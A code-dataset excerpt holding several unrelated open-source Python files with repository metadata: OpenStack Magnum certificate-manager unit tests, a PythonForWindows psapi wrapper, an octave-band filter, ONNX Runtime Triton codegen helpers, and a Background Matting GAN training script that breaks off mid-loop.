self.assertEqual(mock_ca_cert, cluster_ca_cert)
def test_get_cluster_ca_certificate_ca_cert_type(self):
mock_cluster = mock.MagicMock()
mock_cluster.uuid = "mock_cluster_uuid"
mock_ca_cert = mock.MagicMock()
self.CertManager.get_cert.return_value = mock_ca_cert
cluster_ca_cert = cert_manager.get_cluster_ca_certificate(
mock_cluster, ca_cert_type="front-proxy")
self.CertManager.get_cert.assert_called_once_with(
mock_cluster.front_proxy_ca_cert_ref,
resource_ref=mock_cluster.uuid, context=None)
self.assertEqual(mock_ca_cert, cluster_ca_cert)
def test_get_cluster_magnum_cert(self):
mock_cluster = mock.MagicMock()
mock_cluster.uuid = "mock_cluster_uuid"
mock_magnum_cert = mock.MagicMock()
self.CertManager.get_cert.return_value = mock_magnum_cert
cluster_magnum_cert = cert_manager.get_cluster_magnum_cert(
mock_cluster)
self.CertManager.get_cert.assert_called_once_with(
mock_cluster.magnum_cert_ref, resource_ref=mock_cluster.uuid,
context=None)
self.assertEqual(mock_magnum_cert, cluster_magnum_cert)
def test_create_client_files_notin_cache(self):
mock_cluster = mock.MagicMock()
mock_cluster.uuid = "mock_cluster_uuid"
mock_dir = tempfile.mkdtemp()
cert_dir = os.path.join(mock_dir,
mock_cluster.uuid)
cfg.CONF.set_override("temp_cache_dir", mock_dir, group='cluster')
mock_ca_return = '%s/ca.crt' % cert_dir
mock_key_return = '%s/client.key' % cert_dir
mock_magnum_return = '%s/client.crt' % cert_dir
mock_cert = mock.MagicMock()
mock_cert.get_certificate.return_value = "some_content"
mock_cert.get_decrypted_private_key.return_value = "some_key"
self.CertManager.get_cert.return_value = \
mock_cert
# Test that directory and files DNE
self.assertEqual(False, os.path.isdir(cert_dir))
self.assertEqual(False, os.path.isfile(mock_ca_return))
self.assertEqual(False, os.path.isfile(mock_key_return))
self.assertEqual(False, os.path.isfile(mock_magnum_return))
(cluster_ca_cert, cluster_key, cluster_magnum_cert) = \
cert_manager.create_client_files(mock_cluster)
# Test the directory and files were created
self.assertEqual(True, os.path.isdir(cert_dir))
self.assertEqual(True, os.path.isfile(mock_ca_return))
self.assertEqual(True, os.path.isfile(mock_key_return))
self.assertEqual(True, os.path.isfile(mock_magnum_return))
# Test that all functions were called in the if not conditional
self.assertEqual(self.CertManager.get_cert.call_count, 2)
self.assertEqual(mock_cert.get_certificate.call_count, 2)
self.assertEqual(mock_cert.get_decrypted_private_key.call_count, 1)
# Test that contents were written to files & returned properly
cluster_ca_cert.seek(0)
cluster_key.seek(0)
cluster_magnum_cert.seek(0)
self.assertEqual(mock_cert.get_certificate.return_value,
cluster_ca_cert.read())
self.assertEqual(mock_cert.get_decrypted_private_key.return_value,
cluster_key.read())
self.assertEqual(mock_cert.get_certificate.return_value,
cluster_magnum_cert.read())
@mock.patch('magnum.conductor.handlers.common.cert_manager.LOG')
def test_create_client_files_temp_no_dir(self, mock_logging):
mock_cluster = mock.MagicMock()
mock_cluster.uuid = "mock_cluster_uuid"
cfg.CONF.set_override("temp_cache_dir", "", group='cluster')
mock_cert = mock.MagicMock()
mock_cert.get_certificate.return_value = "some_content"
mock_cert.get_decrypted_private_key.return_value = "some_key"
self.CertManager.get_cert.return_value = \
mock_cert
(cluster_ca_cert, cluster_key, cluster_magnum_cert) = \
cert_manager.create_client_files(mock_cluster)
mock_logging.debug.assert_called_once_with(
"Certificates will not be cached in the filesystem: "
"they will be created as tempfiles.")
self.assertEqual(self.CertManager.get_cert.call_count, 2)
self.assertEqual(mock_cert.get_certificate.call_count, 2)
self.assertEqual(mock_cert.get_decrypted_private_key.call_count, 1)
# Test that contents were written to files & returned properly
cluster_ca_cert.seek(0)
cluster_key.seek(0)
cluster_magnum_cert.seek(0)
self.assertEqual(mock_cert.get_certificate.return_value,
cluster_ca_cert.read())
self.assertEqual(mock_cert.get_decrypted_private_key.return_value,
cluster_key.read())
self.assertEqual(mock_cert.get_certificate.return_value,
cluster_magnum_cert.read())
# Test for certs and keys that might be returned in binary
mock_cert.get_certificate.return_value = b"byte_content"
mock_cert.get_decrypted_private_key.return_value = b"byte_key"
ca_cert_text = magnum_cert_text = \
mock_cert.get_certificate.return_value.decode('UTF-8')
magnum_key_text = \
mock_cert.get_decrypted_private_key.return_value.decode('UTF-8')
(cluster_ca_cert, cluster_key, cluster_magnum_cert) = \
cert_manager.create_client_files(mock_cluster)
cluster_ca_cert.seek(0)
cluster_key.seek(0)
cluster_magnum_cert.seek(0)
self.assertEqual(ca_cert_text, cluster_ca_cert.read())
self.assertEqual(magnum_key_text, cluster_key.read())
self.assertEqual(magnum_cert_text, cluster_magnum_cert.read())
def test_create_client_files_in_cache(self):
mock_cluster = mock.MagicMock()
mock_cluster.uuid = "mock_cluster_uuid"
mock_dir = tempfile.mkdtemp()
cfg.CONF.set_override("temp_cache_dir", mock_dir, group='cluster')
mock_cert = mock.MagicMock()
mock_cert.get_certificate.return_value = "some_content"
mock_cert.get_decrypted_private_key.return_value = "some_key"
self.CertManager.get_cert.return_value = \
mock_cert
# First call creates directory and writes files
(cluster_ca_cert, cluster_key, cluster_magnum_cert) = \
cert_manager.create_client_files(mock_cluster)
# Establish call count baseline
self.assertEqual(self.CertManager.get_cert.call_count, 2)
self.assertEqual(mock_cert.get_certificate.call_count, 2)
self.assertEqual(mock_cert.get_decrypted_private_key.call_count, 1)
# Second call to create_client_files for same cluster should enter else
# conditional, open cached file and return file contents unchanged.
(cluster_ca_cert, cluster_key, cluster_magnum_cert) = \
cert_manager.create_client_files(mock_cluster)
# Test that function call count did not increase.
self.assertEqual(self.CertManager.get_cert.call_count, 2)
self.assertEqual(mock_cert.get_certificate.call_count, 2)
self.assertEqual(mock_cert.get_decrypted_private_key.call_count, 1)
# Check that original file contents/return values have not changed
self.assertEqual(mock_cert.get_certificate.return_value,
cluster_ca_cert.read())
self.assertEqual(mock_cert.get_decrypted_private_key.return_value,
cluster_key.read())
self.assertEqual(mock_cert.get_certificate.return_value,
cluster_magnum_cert.read())
def test_create_client_files_set_file_permissions(self):
mock_cluster = mock.MagicMock()
mock_cluster.uuid = "mock_cluster_uuid"
mock_dir = tempfile.mkdtemp()
cert_dir = os.path.join(mock_dir,
mock_cluster.uuid)
cfg.CONF.set_override("temp_cache_dir", mock_dir, group='cluster')
mock_ca_return = '%s/ca.crt' % cert_dir
mock_key_return = '%s/client.key' % cert_dir
mock_magnum_return = '%s/client.crt' % cert_dir
mock_cert = mock.MagicMock()
mock_cert.get_certificate.return_value = "some_content"
mock_cert.get_decrypted_private_key.return_value = "some_key"
self.CertManager.get_cert.return_value = \
mock_cert
cert_manager.create_client_files(mock_cluster)
ca_permission = stat.S_IMODE(os.lstat(mock_ca_return).st_mode)
self.assertEqual(ca_permission, 0o600)
key_permission = stat.S_IMODE(os.lstat(mock_key_return).st_mode)
self.assertEqual(key_permission, 0o600)
magnum_permission = stat.S_IMODE(os.lstat(mock_magnum_return).st_mode)
self.assertEqual(magnum_permission, 0o600)
def test_delete_certificates(self):
mock_delete_cert = self.CertManager.delete_cert
expected_cert_ref = 'cert_ref'
expected_ca_cert_ref = 'ca_cert_ref'
mock_cluster = mock.MagicMock()
mock_cluster.uuid = "mock_cluster_uuid"
mock_cluster.ca_cert_ref = expected_ca_cert_ref
mock_cluster.magnum_cert_ref = expected_cert_ref
cert_manager.delete_certificates_from_cluster(mock_cluster)
mock_delete_cert.assert_any_call(expected_ca_cert_ref,
resource_ref=mock_cluster.uuid,
context=None)
mock_delete_cert.assert_any_call(expected_cert_ref,
resource_ref=mock_cluster.uuid,
context=None)
def test_delete_certificates_if_raise_error(self):
mock_delete_cert = self.CertManager.delete_cert
expected_cert_ref = 'cert_ref'
expected_ca_cert_ref = 'ca_cert_ref'
mock_cluster = mock.MagicMock()
mock_cluster.ca_cert_ref = expected_ca_cert_ref
mock_cluster.magnum_cert_ref = expected_cert_ref
mock_delete_cert.side_effect = ValueError
cert_manager.delete_certificates_from_cluster(mock_cluster)
mock_delete_cert.assert_any_call(expected_ca_cert_ref,
resource_ref=mock_cluster.uuid,
context=None)
mock_delete_cert.assert_any_call(expected_cert_ref,
resource_ref=mock_cluster.uuid,
context=None)
def test_delete_certificates_without_cert_ref(self):
mock_delete_cert = self.CertManager.delete_cert
mock_cluster = mock.MagicMock()
mock_cluster.ca_cert_ref = None
mock_cluster.magnum_cert_ref = None
cert_manager.delete_certificates_from_cluster(mock_cluster)
self.assertFalse(mock_delete_cert.called)
def test_delete_client_files(self):
mock_cluster = mock.MagicMock()
mock_cluster.uuid = "mock_cluster_uuid"
mock_dir = tempfile.mkdtemp()
cert_dir = os.path.join(mock_dir,
mock_cluster.uuid)
cfg.CONF.set_override("temp_cache_dir", mock_dir, group='cluster')
mock_ca_return = '%s/ca.crt' % cert_dir
mock_key_return = '%s/client.key' % cert_dir
mock_magnum_return = '%s/client.crt' % cert_dir
mock_cert = mock.MagicMock()
mock_cert.get_certificate.return_value = "some_content"
mock_cert.get_decrypted_private_key.return_value = "some_key"
self.CertManager.get_cert.return_value = \
mock_cert
(cluster_ca_cert, cluster_key, cluster_magnum_cert) = \
cert_manager.create_client_files(mock_cluster)
# Test the directory and files were created
self.assertEqual(True, os.path.isdir(cert_dir))
self.assertEqual(True, os.path.isfile(mock_ca_return))
self.assertEqual(True, os.path.isfile(mock_key_return))
self.assertEqual(True, os.path.isfile(mock_magnum_return))
cert_manager.delete_client_files(mock_cluster)
# Test that directory and files DNE
self.assertEqual(False, os.path.isdir(cert_dir))
self.assertEqual(False, os.path.isfile(mock_ca_return))
self.assertEqual(False, os.path.isfile(mock_key_return))
self.assertEqual(False, os.path.isfile(mock_magnum_return))
def test_delete_client_files_none(self):
mock_cluster = mock.MagicMock()
mock_cluster.uuid = "mock_cluster_uuid"
mock_dir = tempfile.mkdtemp()
cfg.CONF.set_override("temp_cache_dir", mock_dir, group='cluster')
cert_dir = os.path.join(mock_dir,
mock_cluster.uuid)
self.assertEqual(True, os.path.isdir(mock_dir))
self.assertEqual(False, os.path.isdir(cert_dir))
cert_manager.delete_client_files(mock_cluster)
self.assertEqual(True, os.path.isdir(mock_dir))
self.assertEqual(False, os.path.isdir(cert_dir))
|
7fce0ee3732434a3746ba1a43b5eff06b6e10b73
|
e0cc314aa73c0a965a2022f19900df3ccc8c9f43
|
/windows/winproxy/apis/psapi.py
|
5b7690c4a3b7e8703019f7e04397115c1f79f3c3
|
[
"BSD-3-Clause"
] |
permissive
|
hakril/PythonForWindows
|
21823e743ee4ae7ff99e376378357833f2e19d26
|
82d0c5cc5c9b4d569dca2c755f26b947e3ff74f5
|
refs/heads/master
| 2023-06-08T03:25:50.354768
| 2023-05-26T07:31:06
| 2023-05-26T07:31:06
| 49,235,784
| 568
| 111
|
BSD-3-Clause
| 2023-01-30T12:04:03
| 2016-01-07T22:54:33
|
Python
|
UTF-8
|
Python
| false
| false
| 1,960
|
py
|
psapi.py
|
import ctypes
import windows.generated_def as gdef
from ..apiproxy import ApiProxy, NeededParameter
from ..error import fail_on_zero
class PsapiProxy(ApiProxy):
APIDLL = "psapi"
default_error_check = staticmethod(fail_on_zero)
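# Each proxy below forwards to the corresponding psapi export. When nSize is omitted,
# it defaults to the size (ctypes.sizeof) or length (len) of the supplied buffer.
# Illustrative call pattern (hProcess is a hypothetical process handle):
# buf = ctypes.create_unicode_buffer(0x400)
# GetProcessImageFileNameW(hProcess, buf) # nSize defaults to len(buf)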
@PsapiProxy()
def GetMappedFileNameW(hProcess, lpv, lpFilename, nSize=None):
if nSize is None:
nSize = ctypes.sizeof(lpFilename)
return GetMappedFileNameW.ctypes_function(hProcess, lpv, lpFilename, nSize)
@PsapiProxy()
def GetMappedFileNameA(hProcess, lpv, lpFilename, nSize=None):
if nSize is None:
nSize = ctypes.sizeof(lpFilename)
return GetMappedFileNameA.ctypes_function(hProcess, lpv, lpFilename, nSize)
@PsapiProxy()
def QueryWorkingSet(hProcess, pv, cb):
return QueryWorkingSet.ctypes_function(hProcess, pv, cb)
@PsapiProxy()
def QueryWorkingSetEx(hProcess, pv, cb):
return QueryWorkingSetEx.ctypes_function(hProcess, pv, cb)
@PsapiProxy()
def GetModuleBaseNameA(hProcess, hModule, lpBaseName, nSize=None):
if nSize is None:
nSize = len(lpBaseName)
return GetModuleBaseNameA.ctypes_function(hProcess, hModule, lpBaseName, nSize)
@PsapiProxy()
def GetModuleBaseNameW(hProcess, hModule, lpBaseName, nSize=None):
if nSize is None:
nSize = len(lpBaseName)
return GetModuleBaseNameW.ctypes_function(hProcess, hModule, lpBaseName, nSize)
@PsapiProxy()
def GetProcessImageFileNameA(hProcess, lpImageFileName, nSize=None):
if nSize is None:
nSize = len(lpImageFileName)
return GetProcessImageFileNameA.ctypes_function(hProcess, lpImageFileName, nSize)
@PsapiProxy()
def GetProcessImageFileNameW(hProcess, lpImageFileName, nSize=None):
if nSize is None:
nSize = len(lpImageFileName)
return GetProcessImageFileNameW.ctypes_function(hProcess, lpImageFileName, nSize)
@PsapiProxy()
def GetProcessMemoryInfo(Process, ppsmemCounters, cb):
return GetProcessMemoryInfo.ctypes_function(Process, ppsmemCounters, cb)
|
0cc6483b1baf603a5ad785552c9bbc60eda0ce64
|
9161d1421be019e0573bd123460fe69e7cce4cb9
|
/mosqito/sound_level_meter/noct_spectrum/_n_oct_time_filter.py
|
457739829c03914d1d2226a7538ce24b7937b76e
|
[
"Apache-2.0",
"GPL-1.0-or-later"
] |
permissive
|
Eomys/MoSQITo
|
dadbc9159bfef348b1b762a0c8bef8a7f3ed1ef0
|
b6bf207ef4ac422fa075b5117bb186281b52b7c1
|
refs/heads/master
| 2023-08-03T13:02:07.943373
| 2022-12-23T15:31:36
| 2022-12-23T15:31:36
| 249,368,386
| 107
| 40
|
Apache-2.0
| 2023-08-02T15:47:18
| 2020-03-23T07:56:37
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 1,953
|
py
|
_n_oct_time_filter.py
|
# -*- coding: utf-8 -*-
# Standard library imports
import numpy as np
from scipy.signal import decimate, butter, sosfilt
def _n_oct_time_filter(sig, fs, fc, alpha, N=3):
"""Design of a nth octave filter set
Designs a digital 1/3-octave filter with center frequency fc for
sampling frequency fs. The filter is designed according to the
Order-N specification of the ANSI S1.1-1986 standard. Default
value for N is 3.
References:
ANSI S1.1-1986 (ASA 65-1986): Specifications for
Octave-Band and Fractional-Octave-Band Analog and
Digital Filters.
Parameters
----------
sig : numpy.ndarray
Time signal [any unit]
fs : float
Sampling frequency [Hz]
fc : float
Filter exact center frequency [Hz]
alpha : float
Ratio of the upper and lower band-edge frequencies to the mid-band
frequency
    N : int, optional
        Filter order. Defaults to 3
Outputs
-------
level : float
Rms level of sig in the third octave band centered on fc
"""
# Check for Nyquist-Shannon criteria
if fc > 0.88 * (fs / 2):
raise ValueError(
"""ERROR: Design not possible. Filter center frequency shall
verify: fc <= 0.88 * (fs / 2)"""
)
# Check for high fc/fs causing filter design issue
# [ref needed] and downsample if needed
if fc < fs / 200:
q = 2
while fc < fs / q / 200:
q += 1
sig = decimate(sig, q, axis=0)
fs = fs / q
# Normalized cutoff frequencies
w1 = fc / (fs / 2) / alpha
w2 = fc / (fs / 2) * alpha
# define filter coefficient
sos = butter(int(N), (w1, w2), "bandpass", analog=False, output='sos')
# filter signal
sig_filt = sosfilt(sos, sig, axis=0)
# Compute overall rms level
level = np.sqrt(np.mean(sig_filt ** 2, axis=0))
return level
if __name__ == "__main__":
pass
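    # Minimal usage sketch (illustrative values, not part of the original module):
    # level of a 1 kHz tone in the 1 kHz third-octave band, using
    # alpha = 2 ** (1 / 6), the band-edge ratio of a 1/3-octave filter.
    fs = 48000
    t = np.arange(fs) / fs
    sig = np.sin(2 * np.pi * 1000 * t)
    print(_n_oct_time_filter(sig, fs, fc=1000, alpha=2 ** (1 / 6)))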
|
4270ab4628d32954e5d53c5b4b563d04e748d741
|
0f2b08b31fab269c77d4b14240b8746a3ba17d5e
|
/orttraining/orttraining/python/training/ort_triton/_common.py
|
65540202420b5ee820c6ac0da95a01aa1340749c
|
[
"MIT"
] |
permissive
|
microsoft/onnxruntime
|
f75aa499496f4d0a07ab68ffa589d06f83b7db1d
|
5e747071be882efd6b54d7a7421042e68dcd6aff
|
refs/heads/main
| 2023-09-04T03:14:50.888927
| 2023-09-02T07:16:28
| 2023-09-02T07:16:28
| 156,939,672
| 9,912
| 2,451
|
MIT
| 2023-09-14T21:22:46
| 2018-11-10T02:22:53
|
C++
|
UTF-8
|
Python
| false
| false
| 7,030
|
py
|
_common.py
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# --------------------------------------------------------------------------
from abc import abstractmethod
from typing import Any, Dict, List, Tuple
import sympy
from onnx import GraphProto, NodeProto, TensorProto
from ._sympy_utils import parse_shape
from ._utils import get_attribute, get_reduce_info, next_power_of_2
class CodegenContext:
"""
    Record the variable name mapping in terms of IR nodes.
"""
def __init__(self, var_map: Dict[str, str]):
self._var_map: Dict[str, str] = {**var_map}
# Get variable name by the node arg name in ONNX graph.
def get_variable_name(self, name: str) -> str:
return self._var_map[name]
# For some operators such as data load/store, we need an internal variable name inside the kernel function.
def get_internal_variable_name(self, name: str) -> str:
var_name = self._var_map[name]
return self._var_map[var_name] if var_name in self._var_map else var_name
class CodeBuffer:
def __init__(self):
self.buffer: List[str] = []
def __iadd__(self, other: str):
self.buffer.append(other)
return self
def __str__(self):
return "".join(self.buffer)
class NodeVisitor:
@abstractmethod
def codegen(self, node: Any, context: CodegenContext, code_buffer: CodeBuffer, indent: int):
pass
class TensorInfo:
"""
    Represents an input/output tensor of a node.
"""
def __init__(self, dtype: TensorProto.DataType, shape: List[Any]):
self._dtype: TensorProto.DataType = dtype
self._shape: List[sympy.Expr] = parse_shape(shape)
@property
def dtype(self) -> TensorProto.DataType:
return self._dtype
@property
def shape(self) -> List[sympy.Expr]:
return self._shape
def _infer_elementwise_shape(input_infos: List[TensorInfo]) -> List[sympy.Expr]:
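    # NumPy-style broadcast of the input shapes, aligned on the trailing dimensions:
    # any symbolic or non-1 dimension wins; missing leading dimensions count as 1.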
max_len = max([len(input_info.shape) for input_info in input_infos])
output_shape: List[sympy.Expr] = [sympy.Integer(1)] * max_len
for input_info in input_infos:
offset = max_len - len(input_info.shape)
for i in range(len(input_info.shape)):
if not input_info.shape[i].is_number or input_info.shape[i] != 1:
output_shape[i + offset] = input_info.shape[i]
return output_shape
def _infer_elementwise(node: NodeProto, input_infos: List[TensorInfo], graph: GraphProto) -> List[TensorInfo]:
return [TensorInfo(input_infos[0].dtype, _infer_elementwise_shape(input_infos))]
def _infer_where(node: NodeProto, input_infos: List[TensorInfo], graph: GraphProto) -> List[TensorInfo]:
return [TensorInfo(input_infos[1].dtype, _infer_elementwise_shape(input_infos))]
def _infer_reduction(node: NodeProto, input_infos: List[TensorInfo], graph: GraphProto) -> List[TensorInfo]:
input_rank = len(input_infos[0].shape)
keep_dims, axes = get_reduce_info(node, graph, input_rank)
axes = [axis + input_rank if axis < 0 else axis for axis in axes]
axes.sort()
shape = [input_infos[0].shape[i] for i in range(input_rank) if i not in axes]
if keep_dims:
for axis in axes:
shape.insert(axis, sympy.Integer(1))
return [TensorInfo(input_infos[0].dtype, shape)]
def _infer_unary(node: NodeProto, input_infos: List[TensorInfo], graph: GraphProto) -> List[TensorInfo]:
return [input_infos[0]]
def _infer_cast(node: NodeProto, input_infos: List[TensorInfo], graph: GraphProto) -> List[TensorInfo]:
dtype = get_attribute(node, "to", TensorProto.UNDEFINED)
assert dtype != TensorProto.UNDEFINED
return [TensorInfo(dtype, input_infos[0].shape)]
def _infer_dropout(node: NodeProto, input_infos: List[TensorInfo], graph: GraphProto) -> List[TensorInfo]:
return [input_infos[0], TensorInfo(TensorProto.BOOL, input_infos[0].shape)]
class TypeAndShapeInfer:
_INFER_FUNC_MAP = { # noqa: RUF012
"Add": _infer_elementwise,
"Sub": _infer_elementwise,
"Mul": _infer_elementwise,
"Div": _infer_elementwise,
"Pow": _infer_elementwise,
"Sqrt": _infer_elementwise,
"Exp": _infer_elementwise,
"Where": _infer_where,
"Rsqrt": _infer_elementwise,
"Cast": _infer_cast,
"Dropout": _infer_dropout,
"DropoutGrad": _infer_unary,
"Identity": _infer_unary,
"ReduceSum": _infer_reduction,
"ReduceMax": _infer_reduction,
"ReduceMin": _infer_reduction,
"Sum": _infer_elementwise,
}
@classmethod
def infer(cls, node: NodeProto, input_infos: List[TensorInfo], graph: GraphProto) -> List[TensorInfo]:
if node.op_type not in cls._INFER_FUNC_MAP:
raise NotImplementedError(f"Unsupported op type: {node.op_type}")
return cls._INFER_FUNC_MAP[node.op_type](node, input_infos, graph)
class AutotuneConfigs:
"""
    Generate all autotune configs for a kernel function from its x_numel and r_numel.
    A config is a tuple of (xblock, rblock, num_warps).
    For an elementwise kernel, r_numel is 1.
    For a reduction kernel over the last contiguous dimensions, the contiguous flag is True.
"""
def __init__(self, x_numel: int, r_numel: int, contiguous: bool):
self.configs: List[Tuple[int, int, int]] = self._gen_autotune_configs(x_numel, r_numel, contiguous)
self.requires_for_loop: bool = any(config[1] < r_numel for config in self.configs)
def _num_warps(self, x: int, r: int) -> int:
return min(max(x * r // 256, 2), 8)
def _gen_config(self, xnp2: int, rnp2: int, x: int, r: int) -> Tuple[int, int, int]:
x = min(x, xnp2)
r = min(r, rnp2)
return x, r, self._num_warps(x, r)
# TODO: we need to tune more kernels to get more reasonable configs for better performance.
def _gen_autotune_configs(self, x_numel: int, r_numel: int, contiguous: bool) -> List[Tuple[int, int, int]]:
configs = []
xnp2 = next_power_of_2(x_numel)
if r_numel == 1:
configs.append(self._gen_config(xnp2, 1, 1024, 1))
if xnp2 > 1024:
configs.append(self._gen_config(xnp2, 1, 2048, 1))
return configs
rnp2 = next_power_of_2(r_numel)
if contiguous:
configs.append(self._gen_config(xnp2, rnp2, 1, 2048))
if rnp2 > 2048:
configs.append(self._gen_config(xnp2, rnp2, 1, 4096))
elif rnp2 <= 256:
x = min(xnp2, 256 // rnp2 * 2)
configs.append(self._gen_config(xnp2, rnp2, x, rnp2))
else:
config_set = {
self._gen_config(xnp2, rnp2, 1, 2048),
self._gen_config(xnp2, rnp2, 4, 512),
self._gen_config(xnp2, rnp2, 8, 512),
self._gen_config(xnp2, rnp2, 32, 128),
}
configs = list(config_set)
return configs
|
c65d63167a55324a1987c6758bb5833edc2a898f
|
c168fe819b446640957e5e310ef89fcfe28662b3
|
/torchbenchmark/models/Background_Matting/train_real_fixed.py
|
c8636ece697bd64748207875f46e8c1aa0dcf945
|
[
"CC-BY-NC-SA-4.0",
"BSD-3-Clause"
] |
permissive
|
pytorch/benchmark
|
7b55e8d714de2ea873e03df43811aab3848485dd
|
df4da9bdff11a2f948d5bd4ac83da7922e6f44f4
|
refs/heads/main
| 2023-08-29T13:06:09.671728
| 2023-08-28T16:51:55
| 2023-08-28T16:51:55
| 92,541,759
| 685
| 220
|
BSD-3-Clause
| 2023-09-14T18:10:18
| 2017-05-26T19:21:12
|
Python
|
UTF-8
|
Python
| false
| false
| 8,803
|
py
|
train_real_fixed.py
|
from __future__ import print_function
import torch
from torch.autograd import Variable
import torch.nn as nn
import torch.optim as optim
from tensorboardX import SummaryWriter
import os
import time
import argparse
import numpy as np
from data_loader import VideoData
from functions import *
from networks import ResnetConditionHR, MultiscaleDiscriminator, conv_init
from loss_functions import alpha_loss, compose_loss, alpha_gradient_loss, GANloss
#CUDA
#os.environ["CUDA_VISIBLE_DEVICES"]="4"
print('CUDA Device: ' + os.environ["CUDA_VISIBLE_DEVICES"])
"""Parses arguments."""
parser = argparse.ArgumentParser(description='Training Background Matting on Adobe Dataset.')
parser.add_argument('-n', '--name', type=str, help='Name of tensorboard and model saving folders.')
parser.add_argument('-bs', '--batch_size', type=int, help='Batch Size.')
parser.add_argument('-res', '--reso', type=int, help='Input image resolution')
parser.add_argument('-init_model', '--init_model', type=str, help='Initial model file')
parser.add_argument('-epoch', '--epoch', type=int, default=10,help='Maximum Epoch')
parser.add_argument('-n_blocks1', '--n_blocks1', type=int, default=7,help='Number of residual blocks after Context Switching.')
parser.add_argument('-n_blocks2', '--n_blocks2', type=int, default=3,help='Number of residual blocks for Fg and alpha each.')
parser.add_argument('-d', '--debug', type=str, default="", help='File to dump output')
parser.add_argument('-s', '--script', type=bool, default=False, help='Trace the model')
args=parser.parse_args()
##Directories
tb_dir='TB_Summary/' + args.name
model_dir='Models/' + args.name
torch.manual_seed(1337)
np.random.seed(1337)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
if not os.path.exists(model_dir):
os.makedirs(model_dir)
if not os.path.exists(tb_dir):
os.makedirs(tb_dir)
## Input list
data_config_train = {'reso': (args.reso,args.reso)} #if trimap is true, rcnn is used
# DATA LOADING
print('\n[Phase 1] : Data Preparation')
def collate_filter_none(batch):
batch = list(filter(lambda x: x is not None, batch))
return torch.utils.data.dataloader.default_collate(batch)
#Original Data
traindata = VideoData(csv_file='Video_data_train.csv',data_config=data_config_train,transform=None) #Write a dataloader function that can read the database provided by .csv file
train_loader = torch.utils.data.DataLoader(traindata, batch_size=args.batch_size, shuffle=True, num_workers=args.batch_size, collate_fn=collate_filter_none)
print('\n[Phase 2] : Initialization')
netB=ResnetConditionHR(input_nc=(3,3,1,4),output_nc=4,n_blocks1=args.n_blocks1,n_blocks2=args.n_blocks2)
#netB=nn.DataParallel(netB)
#netB.load_state_dict(torch.load(args.init_model))
netB.cuda(); netB.eval()
for param in netB.parameters(): #freeze netD
param.requires_grad = False
netG=ResnetConditionHR(input_nc=(3,3,1,4),output_nc=4,n_blocks1=args.n_blocks1,n_blocks2=args.n_blocks2)
netG.apply(conv_init)
#netG=nn.DataParallel(netG)
netG.cuda()
torch.backends.cudnn.benchmark=True
netD=MultiscaleDiscriminator(input_nc=3,num_D=1,norm_layer=nn.InstanceNorm2d,ndf=64)
netD.apply(conv_init)
netD=nn.DataParallel(netD)
netD.cuda()
#Loss
l1_loss=alpha_loss()
c_loss=compose_loss()
g_loss=alpha_gradient_loss()
GAN_loss=GANloss()
optimizerG = optim.Adam(netG.parameters(), lr=1e-4)
optimizerD = optim.Adam(netD.parameters(), lr=1e-5)
log_writer=SummaryWriter(tb_dir)
step=50
KK=len(train_loader)
wt=1
print('Tracing')
for data in train_loader:
bg, image, seg, multi_fr = data['bg'], data['image'], data['seg'], data['multi_fr']
bg, image, seg, multi_fr = Variable(bg.cuda()), Variable(image.cuda()), Variable(seg.cuda()), Variable(multi_fr.cuda())
if args.script:
netB = torch.jit.trace(netB,(image,bg,seg,multi_fr))
netG = torch.jit.trace(netG,(image,bg,seg,multi_fr))
else:
netB(image,bg,seg,multi_fr)
netG(image,bg,seg,multi_fr)
break
print('Starting training')
for epoch in range(0,args.epoch):
netG.train(); netD.train()
lG, lD, GenL, DisL_r, DisL_f, alL, fgL, compL, elapse_run, elapse=0,0,0,0,0,0,0,0,0,0
t0=time.time();
for i,data in enumerate(train_loader):
#Initiating
bg, image, seg, multi_fr, seg_gt, back_rnd = data['bg'], data['image'], data['seg'], data['multi_fr'], data['seg-gt'], data['back-rnd']
bg, image, seg, multi_fr, seg_gt, back_rnd = Variable(bg.cuda()), Variable(image.cuda()), Variable(seg.cuda()), Variable(multi_fr.cuda()), Variable(seg_gt.cuda()), Variable(back_rnd.cuda())
mask0=Variable(torch.ones(seg.shape).cuda())
tr0=time.time()
#pseudo-supervision
alpha_pred_sup,fg_pred_sup=netB(image,bg,seg,multi_fr)
mask=(alpha_pred_sup>-0.98).type(torch.cuda.FloatTensor)
mask1=(seg_gt>0.95).type(torch.cuda.FloatTensor)
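        # mask: pixels where the frozen teacher netB predicts non-background alpha
        # (alpha lies in [-1, 1]); mask1: confident foreground from the segmentation GT.
        # They restrict the pseudo-supervised fg loss and the composition loss below.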
## Train Generator
alpha_pred,fg_pred=netG(image,bg,seg,multi_fr)
if args.debug:
torch.save(fg_pred, args.debug)
##pseudo-supervised losses
al_loss=l1_loss(alpha_pred_sup,alpha_pred,mask0)+0.5*g_loss(alpha_pred_sup,alpha_pred,mask0)
fg_loss=l1_loss(fg_pred_sup,fg_pred,mask)
#compose into same background
comp_loss= c_loss(image,alpha_pred,fg_pred,bg,mask1)
#randomly permute the background
perm=torch.LongTensor(np.random.permutation(bg.shape[0]))
bg_sh=bg[perm,:,:,:]
al_mask=(alpha_pred>0.95).type(torch.cuda.FloatTensor)
#Choose the target background for composition
#back_rnd: contains separate set of background videos captured
#bg_sh: contains randomly permuted captured background from the same minibatch
if np.random.random_sample() > 0.5:
bg_sh=back_rnd
image_sh=compose_image_withshift(alpha_pred,image*al_mask + fg_pred*(1-al_mask),bg_sh,seg)
fake_response=netD(image_sh)
loss_ganG=GAN_loss(fake_response,label_type=True)
lossG= loss_ganG + wt*(0.05*comp_loss+0.05*al_loss+0.05*fg_loss)
optimizerG.zero_grad()
lossG.backward()
optimizerG.step()
##Train Discriminator
fake_response=netD(image_sh); real_response=netD(image)
loss_ganD_fake=GAN_loss(fake_response,label_type=False)
loss_ganD_real=GAN_loss(real_response,label_type=True)
lossD=(loss_ganD_real+loss_ganD_fake)*0.5
        # Update the discriminator once every 5 generator updates
if i%5 ==0:
optimizerD.zero_grad()
lossD.backward()
optimizerD.step()
lG += lossG.data
lD += lossD.data
GenL += loss_ganG.data
DisL_r += loss_ganD_real.data
DisL_f += loss_ganD_fake.data
alL += al_loss.data
fgL += fg_loss.data
compL += comp_loss.data
log_writer.add_scalar('Generator Loss', lossG.data, epoch*KK + i + 1)
log_writer.add_scalar('Discriminator Loss', lossD.data, epoch*KK + i + 1)
log_writer.add_scalar('Generator Loss: Fake', loss_ganG.data, epoch*KK + i + 1)
